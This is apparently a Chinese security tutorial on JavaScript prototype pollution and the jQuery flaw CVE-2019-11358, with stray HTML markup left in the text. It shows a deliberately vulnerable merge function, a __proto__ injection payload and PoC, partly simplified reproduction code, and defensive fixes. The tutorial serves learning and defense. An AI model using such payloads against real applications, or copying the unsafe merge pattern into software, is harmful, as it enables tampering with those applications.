JavaScript原型链污染漏洞分析与防御（CVE-2019-11358）<\/h1>

一、JavaScript原型基础<\/h2>

1. JavaScript的类与实例<\/h3>
在JavaScript中，构造函数相当于类，通过new<\/code>关键词或Object.create()<\/code>方法创建实例<\/li>
示例：<\/li>
<\/ul>
function<\/span> Func<\/span>() {
<\/span><\/span>    this<\/span>.demo<\/span> =<\/span> 1<\/span>;
<\/span><\/span>}
<\/span><\/span>var<\/span> func<\/span> =<\/span> new<\/span> Func<\/span>();
<\/span><\/span><\/code><\/pre>2. prototype与__proto__<\/h3>


prototype属性<\/strong>：<\/p>

所有JavaScript函数都有一个prototype<\/code>属性，指向该构造函数的原型<\/li>
例如Func.prototype<\/code>指向Func<\/code>的原型<\/li>
<\/ul>
<\/li>

__proto__属性<\/strong>：<\/p>

所有JavaScript实例对象都有一个__proto__<\/code>属性，指向其实例对象的原型<\/li>
例如func.__proto__<\/code>指向func<\/code>的原型<\/li>
<\/ul>
<\/li>

关系总结：<\/p>

实例对象的__proto__<\/code>指向构造函数的prototype<\/code><\/li>
原型链终点为null<\/code>（Object.prototype.__proto__ === null<\/code>）<\/li>
<\/ul>
<\/li>
<\/ul>
二、JavaScript原型链机制<\/h2>
1. 原型链结构<\/h3>

示例原型链：

func -> Func.prototype -> Object.prototype -> null<\/code><\/li>
array -> Array.prototype -> Object.prototype -> null<\/code><\/li>
date -> Date.prototype -> Object.prototype -> null<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
2. 继承查找过程<\/h3>


属性查找顺序：<\/p>

对象自身属性<\/li>
对象的__proto__<\/code>（构造函数的prototype<\/code>）<\/li>
递归查找__proto__.__proto__<\/code>直到null<\/code><\/li>
<\/ol>
<\/li>

继承示例：<\/p>
<\/li>
<\/ul>
function<\/span> Father<\/span>() {
<\/span><\/span>    this<\/span>.first_name<\/span> =<\/span> 'Tome'<\/span>;
<\/span><\/span>    this<\/span>.last_name<\/span> =<\/span> 'Alpha'<\/span>;
<\/span><\/span>}
<\/span><\/span>function<\/span> Son<\/span>() {
<\/span><\/span>    this<\/span>.first_name<\/span> =<\/span> 'Lisa'<\/span>;
<\/span><\/span>}
<\/span><\/span>Son<\/span>.prototype<\/span> =<\/span> new<\/span> Father<\/span>();
<\/span><\/span>let<\/span> son<\/span> =<\/span> new<\/span> Son<\/span>();
<\/span><\/span>console<\/span>.log<\/span>(`Name: <\/span>${<\/span>son<\/span>.first_name<\/span>}<\/span> <\/span>${<\/span>son<\/span>.last_name<\/span>}<\/span>`<\/span>);
<\/span><\/span>\/\/ 输出：Name: Lisa Alpha
<\/span><\/span><\/span><\/code><\/pre>三、原型链污染机制<\/h2>
1. 基本原理<\/h3>

通过控制对象属性名（特别是__proto__<\/code>）和赋值操作，修改原型链上的属性<\/li>
影响范围：所有来自同一类、父祖类的对象<\/li>
<\/ul>
2. 污染条件<\/h3>

对象\/数组的键名或属性名可控<\/li>
存在赋值操作<\/li>
<\/ol>
3. 常见场景<\/h3>

对象合并（merge）操作<\/li>
对象克隆（clone）操作<\/li>
<\/ul>
4. 污染示例<\/h3>
function<\/span> merge<\/span>(target<\/span>, source<\/span>) {
<\/span><\/span>    for<\/span>(let<\/span> key<\/span> in<\/span> source<\/span>) {
<\/span><\/span>        if<\/span>(key<\/span> in<\/span> source<\/span> &&<\/span> key<\/span> in<\/span> target<\/span>) {
<\/span><\/span>            merge<\/span>(target<\/span>[key<\/span>], source<\/span>[key<\/span>]);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            target<\/span>[key<\/span>] =<\/span> source<\/span>[key<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 污染成功示例
<\/span><\/span><\/span><\/span>let<\/span> demo1<\/span> =<\/span> {};
<\/span><\/span>let<\/span> demo2<\/span> =<\/span> JSON<\/span>.parse<\/span>('{"name": "h3", "__proto__": {"age": 20}}'<\/span>);
<\/span><\/span>merge<\/span>(demo1<\/span>, demo2<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(demo1<\/span>.name<\/span>, demo1<\/span>.age<\/span>); \/\/ h3 20
<\/span><\/span><\/span><\/span>
<\/span><\/span>let<\/span> demo3<\/span> =<\/span> {};
<\/span><\/span>console<\/span>.log<\/span>(demo3<\/span>.age<\/span>); \/\/ 20（污染成功）
<\/span><\/span><\/span><\/code><\/pre>四、CVE-2019-11358漏洞分析<\/h2>
1. 漏洞信息<\/h3>

影响版本：jQuery < 3.4.0<\/li>
漏洞类型：原型污染<\/li>
危害：可能导致拒绝服务或代码执行<\/li>
<\/ul>
2. 漏洞原理<\/h3>

jQuery的extend<\/code>函数在深拷贝模式下未正确处理__proto__<\/code>属性<\/li>
攻击者可注入恶意属性污染Object原型<\/li>
<\/ul>
3. 关键代码分析<\/h3>
jQuery<\/span>.extend<\/span> =<\/span> jQuery<\/span>.fn<\/span>.extend<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    var<\/span> options<\/span>, name<\/span>, src<\/span>, copy<\/span>, copyIsArray<\/span>, clone<\/span>,
<\/span><\/span>        target<\/span> =<\/span> arguments<\/span>[0<\/span>] ||<\/span> {},
<\/span><\/span>        i<\/span> =<\/span> 1<\/span>,
<\/span><\/span>        length<\/span> =<\/span> arguments<\/span>.length<\/span>,
<\/span><\/span>        deep<\/span> =<\/span> false<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 深拷贝模式判断
<\/span><\/span><\/span><\/span>    if<\/span>(typeof<\/span> target<\/span> ===<\/span> "boolean"<\/span>) {
<\/span><\/span>        deep<\/span> =<\/span> target<\/span>;
<\/span><\/span>        target<\/span> =<\/span> arguments<\/span>[i<\/span>] ||<\/span> {};
<\/span><\/span>        i<\/span>++<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 遍历参数
<\/span><\/span><\/span><\/span>    for<\/span>(; i<\/span> <<\/span> length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>        if<\/span>((options<\/span> =<\/span> arguments<\/span>[i<\/span>]) !=<\/span> null<\/span>) {
<\/span><\/span>            \/\/ 遍历属性
<\/span><\/span><\/span><\/span>            for<\/span>(name<\/span> in<\/span> options<\/span>) {
<\/span><\/span>                src<\/span> =<\/span> target<\/span>[name<\/span>];
<\/span><\/span>                copy<\/span> =<\/span> options<\/span>[name<\/span>]; \/\/ 外部可控
<\/span><\/span><\/span><\/span>                
<\/span><\/span>                \/\/ 深拷贝处理
<\/span><\/span><\/span><\/span>                if<\/span>(deep<\/span> &&<\/span> copy<\/span> &&<\/span> (jQuery<\/span>.isPlainObject<\/span>(copy<\/span>) ||<\/span> 
<\/span><\/span>                   (copyIsArray<\/span> =<\/span> Array.isArray<\/span>(copy<\/span>)))) {
<\/span><\/span>                    \/\/ 递归处理对象或数组
<\/span><\/span><\/span><\/span>                    target<\/span>[name<\/span>] =<\/span> jQuery<\/span>.extend<\/span>(deep<\/span>, clone<\/span>, copy<\/span>);
<\/span><\/span>                } else<\/span> if<\/span>(copy<\/span> !==<\/span> undefined<\/span>) {
<\/span><\/span>                    \/\/ 直接赋值
<\/span><\/span><\/span><\/span>                    target<\/span>[name<\/span>] =<\/span> copy<\/span>;
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>4. 漏洞利用<\/h3>

PoC：<\/li>
<\/ul>
$<\/span>.extend<\/span>(true<\/span>, {}, JSON<\/span>.parse<\/span>('{"__proto__": {"exploit": "h3rmesk1t"}}'<\/span>));
<\/span><\/span>console<\/span>.log<\/span>(exploit<\/span>); \/\/ 输出"h3rmesk1t"
<\/span><\/span><\/span><\/code><\/pre>
复现步骤：<\/li>
<\/ul>
var<\/span> jquery<\/span> =<\/span> document.createElement<\/span>('script'<\/span>);
<\/span><\/span>jquery<\/span>.src<\/span> =<\/span> 'https:\/\/code.jquery.com\/jquery-3.3.1.min.js'<\/span>;
<\/span><\/span>let<\/span> exp<\/span> =<\/span> $<\/span>.extend<\/span>(true<\/span>, {}, JSON<\/span>.parse<\/span>('{"__proto__": {"exploit": "h3rmesk1t"}}'<\/span>));
<\/span><\/span>console<\/span>.log<\/span>({}.exploit<\/span>); \/\/ 输出"h3rmesk1t"
<\/span><\/span><\/span><\/code><\/pre>五、防御措施<\/h2>
1. 官方修复方案<\/h3>

jQuery 3.4.0+版本增加了对__proto__<\/code>属性的检查<\/li>
修复方式：检测到__proto__<\/code>属性时跳过合并<\/li>
<\/ul>
2. 开发建议<\/h3>

避免使用不安全的对象合并\/克隆操作<\/li>
对用户输入的JSON数据进行严格过滤<\/li>
检查对象属性名是否包含敏感键（如__proto__<\/code>、constructor<\/code>等）<\/li>
使用Object.create(null)<\/code>创建无原型的对象<\/li>
<\/ol>
3. 安全编码示例<\/h3>
\/\/ 安全的merge函数
<\/span><\/span><\/span><\/span>function<\/span> safeMerge<\/span>(target<\/span>, source<\/span>) {
<\/span><\/span>    for<\/span>(let<\/span> key<\/span> in<\/span> source<\/span>) {
<\/span><\/span>        if<\/span>(key<\/span> ===<\/span> '__proto__'<\/span> ||<\/span> key<\/span> ===<\/span> 'constructor'<\/span> ||<\/span> key<\/span> ===<\/span> 'prototype'<\/span>) {
<\/span><\/span>            continue<\/span>; \/\/ 跳过敏感键
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>        if<\/span>(key<\/span> in<\/span> source<\/span> &&<\/span> key<\/span> in<\/span> target<\/span>) {
<\/span><\/span>            safeMerge<\/span>(target<\/span>[key<\/span>], source<\/span>[key<\/span>]);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            target<\/span>[key<\/span>] =<\/span> source<\/span>[key<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>六、总结<\/h2>
JavaScript原型链污染是一种通过修改对象原型链来影响所有相关对象的安全漏洞。CVE-2019-11358展示了jQuery在对象深拷贝时未正确处理__proto__<\/code>属性导致的严重安全问题。开发者应当：<\/p>

及时更新依赖库到安全版本<\/li>
避免直接使用不受信任的JSON数据<\/li>
实现安全的对象操作函数<\/li>
了解原型链机制，编写防御性代码<\/li>
<\/ol>
通过理解原型链机制和污染原理，开发者可以更好地预防此类安全问题，构建更安全的JavaScript应用。<\/p>